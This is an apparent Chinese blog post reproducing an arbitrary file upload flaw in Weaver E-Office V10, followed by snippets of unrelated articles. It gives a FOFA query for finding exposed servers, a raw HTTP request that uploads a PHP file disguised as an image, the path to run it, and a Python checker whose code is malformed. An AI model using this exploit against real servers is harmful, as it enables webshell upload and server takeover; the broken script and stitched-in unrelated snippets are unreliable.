泛微OA E-Office V10 OfficeServer 任意文件上传漏洞复现
声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
漏洞简介
泛微e-ofice是一款标准化的协同0A办公软件,泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等
FOFA语法
body="eoffice10" && body="eoffice_loading_tip"
Poc
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept-Encoding: gzip, deflate
Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
漏洞复现
1、访问漏洞环境
2、老形式,burp重放一下
出现下面的状态码和响应包说明漏洞可能存在
3、然后访问如下的URL链接,即可查看上传文件内容
http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php
poc(python脚本)
import re
import requestsurl='http://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
headers = {'User - Agent':'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','Content - Length':'393','Content - Type': 'multipart / form - data;','boundary = ----WebKitFormBoundaryJjb5ZAJOOXO7fwjs''Accept - Encoding': 'gzip, deflate','Connection':'close'
}data = {"------WebKitFormBoundaryJjb5ZAJOOXO7fwjs"'Content-Disposition': 'form-data; name="FileData"; filename="1.jpg"','Content-Type': 'image/jpeg''<?php phpinfo();unlink(__FILE__);?>'"------WebKitFormBoundaryJjb5ZAJOOXO7fwjs",'Content-Disposition': 'form-data; name="FormData"'"{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}""------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--"
}response = requests.post(url, headers=headers, data=data)print('Status Code:', response.status_code)if response.status_code == 200:print("存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞!!")修复建议
去官网打补丁
相关文章:
泛微OA E-Office V10 OfficeServer 任意文件上传漏洞复现
声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件,泛微 …...
spring-cloud-starter-gateway踩坑
1.bean of type org.springframework.http.codec.ServerCodecConfigurer that could not be found. 需要将项目中用到的spring-boot-starter-web依赖给去掉 去掉以下的 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-bo…...
视频SDK开发,多平台SDK快速接入
随着科技的不断发展,视频已经成为了企业业务中不可或缺的一部分。无论是在线教育、企业培训还是产品展示,视频都发挥着至关重要的作用。为了满足企业对视频应用的需求,美摄视频SDK应运而生,为企业提供了一站式的视频解决方案。 一…...
面试官:如何理解CDN?说说实现原理?
一、是什么 CDN (全称 Content Delivery Network),即内容分发网络 构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降…...
C语言 牛客网习题 10.20 day2
1.求最小公倍数 正整数A和正整数B 的最小公倍数是指 能被A和B整除的最小的正整数值,设计一个算法,求输入A和B的最小公倍数。 1≤a, b≤100000 输入描述: 输入两个正整数A和B。 输出描述: 输出A和B的最小公倍数。 #include <st…...
SpringCloud: sentinel热点参数限制
一、定义controller package cn.edu.tju.controller;import com.alibaba.csp.sentinel.annotation.SentinelResource; import com.alibaba.csp.sentinel.slots.block.BlockException; import org.springframework.web.bind.annotation.PathVariable; import org.springframewo…...
PDF编辑阅读 PDF Expert v3.5.2
PDF Expert是由Readdle开发的一款专业的PDF编辑和阅读工具。它可以帮助用户在Mac、iPad和iPhone等设备上查看、注释、编辑、填写和签署PDF文档。 以下是PDF Expert的特点: PDF编辑:PDF Expert提供了丰富的PDF编辑功能,包括添加、删除、移动…...
新技术:WEB组态能页面嵌套、属性继承吗?
目前市面上的工业组态或数据大屏工具有不少,也有很多0代码、无代码、低代码、零代码、低代码概念。 有没有可以支持图纸嵌套、属性暴露的?或者说页面任意嵌套、属性多继承暴露到上层? 比如页面A有输入框,页面B有对话框ÿ…...
【C++ Primer Plus学习记录】复习题
1.如何声明下述数据? a.actor是由30个char组成的数组。 char actor[30]; b.betsie是由100个short组成的数组。 short betsie[100]; c.chuck是由13个float组成的数组。 flaot chuck[13]; d.dipsea是由64个long double组成的数组。 long double dipsea[64]; …...
【LeetCode】62. 不同路径
1 问题 一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为 “Start” )。 机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为 “Finish” )。 问总共有多少条不同的路径?…...
【lesson13】进程地址空间收尾
文章目录 进程地址空间存在的原因原因一原因二原因三 重新理解什么是挂起? 进程地址空间存在的原因 原因一 凡是非法访问或者映射,OS都会识别到,并终止该进程。 例子: 我们会发现我们定义的字符串常量只有只读权限,…...
Microsoft Edge中使用开源的ChatGPT
一、双击打开浏览器 找到:扩展,打开 二、打开Microsoft Edge加载项 三、Move tab新标签 获取免费ChatGPT 四、启用Move tab。启用ChatGPT。 扩展 管理扩展 启用 五、新建标签页,使用GPT 六、使用举例 提问 GPT回复...
【C语言精髓之指针】结构体指针(->与.两个运算符的区别)
/*** file * author jUicE_g2R(qq:3406291309)————彬(bin-必应)* 通信与信息专业大二在读 * copyright 2023.10* COPYRIGHT 原创技术笔记:转载需获得博主本人同意,且需标明转载源* language C/C* IDE Base on Mic…...
SpringCloud 微服务全栈体系(一)
第一章 认识微服务 随着互联网行业的发展,对服务的要求也越来越高,服务架构也从单体架构逐渐演变为现在流行的微服务架构。这些架构之间有怎样的差别呢? 一、单体架构 单体架构:将业务的所有功能集中在一个项目中开发ÿ…...
Echarts自定义柱状图
目录 效果图 echarts官网找相似图 将柱状图引入html页面中 自定义柱状图 将不需要的属性删除 编辑 修改图形大小 grid 不显示x轴 编辑 不显示y轴线和相关刻度 编辑 y轴文字的颜色设置为自己想要的颜色 修改第一组柱子相关样式(条状) …...
-- ioqueue - io序列操作)
LuatOS-SOC接口文档(air780E)-- ioqueue - io序列操作
ioqueue.init(hwtimer_id,cmd_cnt,repeat_cnt) 初始化一个io操作队列 参数 传入值类型 解释 int 硬件定时器id,默认用0,根据实际MCU确定,air105为0~5,与pwm共用,同一个通道号不能同时为pwm和ioqueue int 一个完…...
探讨Socks5代理技术的原理及其在不同领域的应用
Socks5代理:实现网络连接的智能之选 作为一种网络代理协议,Socks5代理技术通过转发网络数据包,实现了客户端和服务器之间的代理传输。其独特的特性在跨界电商、爬虫数据分析、企业出海和游戏体验等领域发挥着关键作用,为用户提供…...
sql注入的基本手法
目的 通过sqk注入获取数据内容 掌握sql注入基本手法 我们这里使用 1.联合注入 就是利用union select 语句 两条语句 同时执行 实现跨库跨表查询 条件 两条select语句查询结果具有相同列数 对应列数数据类型相同 简单的步骤 1.目标分析 ?id…...
8.1 C++ 标准输入输出流
C/C语言是一种通用的编程语言,具有高效、灵活和可移植等特点。C语言主要用于系统编程,如操作系统、编译器、数据库等;C语言是C语言的扩展,增加了面向对象编程的特性,适用于大型软件系统、图形用户界面、嵌入式系统等。…...
hive往es映射表写数据报错
hive是基于Hadoop的一个数据仓库工具,用来进行数据提取、转化、加载,这是一种可以存储、查询和分析存储在Hadoop中的大规模数据的机制。hive数据仓库工具能将结构化的数据文件映射为一张数据库表,并提供SQL查询功能,能将SQL语句转…...
Formily终极指南:5个核心特性解决复杂表单开发难题
Formily终极指南:5个核心特性解决复杂表单开发难题 【免费下载链接】formily 📱🚀 🧩 Cross Device & High Performance Normal Form/Dynamic(JSON Schema) Form/Form Builder -- Support React/React Native/Vue 2/Vue 3 项…...
UVM验证中的‘广播站’:深入理解analysis端口的一对多通信模型与实战
UVM验证中的‘广播站’:深入理解analysis端口的一对多通信模型与实战 想象一下城市里的广播电台——当主播的声音通过电波传出时,所有调频到这个频道的收音机都能同步接收相同的内容。在UVM验证环境中,uvm_analysis_port就扮演着类似的角色&a…...
思源宋体CN终极指南:7款免费开源中文字体快速上手教程
思源宋体CN终极指南:7款免费开源中文字体快速上手教程 【免费下载链接】source-han-serif-ttf Source Han Serif TTF 项目地址: https://gitcode.com/gh_mirrors/so/source-han-serif-ttf 思源宋体CN(Source Han Serif CN)是Google与A…...
别再只盯着ICP了!深入浅出图解GICP、VGICP与NDT:高精地图匹配中的“分布”艺术
点云匹配算法中的分布艺术:从GICP到NDT的深度解析 在自动驾驶与机器人定位领域,点云匹配算法如同一位隐形的导航员,默默决定着系统对环境的理解精度。当我们谈论高精地图匹配时,传统ICP算法早已不是唯一选择,GICP、VGI…...
Gemma-4-26B-A4B-it-GGUF实操手册:GPU温度监控+功耗限制+llama_cpp推理线程数调优指南
Gemma-4-26B-A4B-it-GGUF实操手册:GPU温度监控功耗限制llama_cpp推理线程数调优指南 1. 项目概述 Gemma-4-26B-A4B-it-GGUF是Google Gemma 4系列中的高性能MoE(混合专家)聊天模型,具备256K tokens的超长上下文处理能力ÿ…...
LoRa网络‘侦察兵’:深入SX126x CAD原理,从调制解调器视角看懂信号检测
LoRa网络‘侦察兵’:深入SX126x CAD原理,从调制解调器视角看懂信号检测 在低功耗广域物联网(LPWAN)应用中,LoRa技术凭借其出色的通信距离和抗干扰能力成为行业标杆。但鲜为人知的是,支撑这些优势的核心技术…...
)
Ubuntu 20.04下,用Anaconda虚拟环境搞定pycairo和PyGObject安装(附清华源加速)
Ubuntu 20.04下Anaconda虚拟环境中pycairo与PyGObject的完整安装指南 在Python开发中,特别是涉及多媒体处理、图形界面开发或无人机视觉应用时,pycairo和PyGObject这两个库几乎是绕不开的依赖项。然而,许多开发者在Ubuntu系统下通过pip安装这…...
GEO优化系统实战:如何在不侵犯隐私的前提下提升用户体验?
GEO优化系统实战:隐私保护与用户体验的双赢策略 当用户打开一款旅行APP时,系统自动推荐当地特色活动和附近餐厅;电商平台根据用户所在城市调整运费计算规则;内容平台优先展示本地新闻——这些场景背后都离不开GEO优化系统的支持。…...
为什么92%的C++团队尚未启用C++26反射?,4类典型误用陷阱与工业级避坑清单
第一章:C26反射特性演进与工业落地现状C26 正式将核心反射(Core Reflection)纳入工作草案(WG21 P2996R3),标志着语言级元编程进入实用化阶段。相比 C20 的 constexpr 模拟和 C23 的有限模板元信息访问&…...
Windows Cleaner深度解析:开源工具如何彻底解决C盘空间不足问题
Windows Cleaner深度解析:开源工具如何彻底解决C盘空间不足问题 【免费下载链接】WindowsCleaner Windows Cleaner——专治C盘爆红及各种不服! 项目地址: https://gitcode.com/gh_mirrors/wi/WindowsCleaner 你是否曾经看着电脑右下角那个刺眼的红…...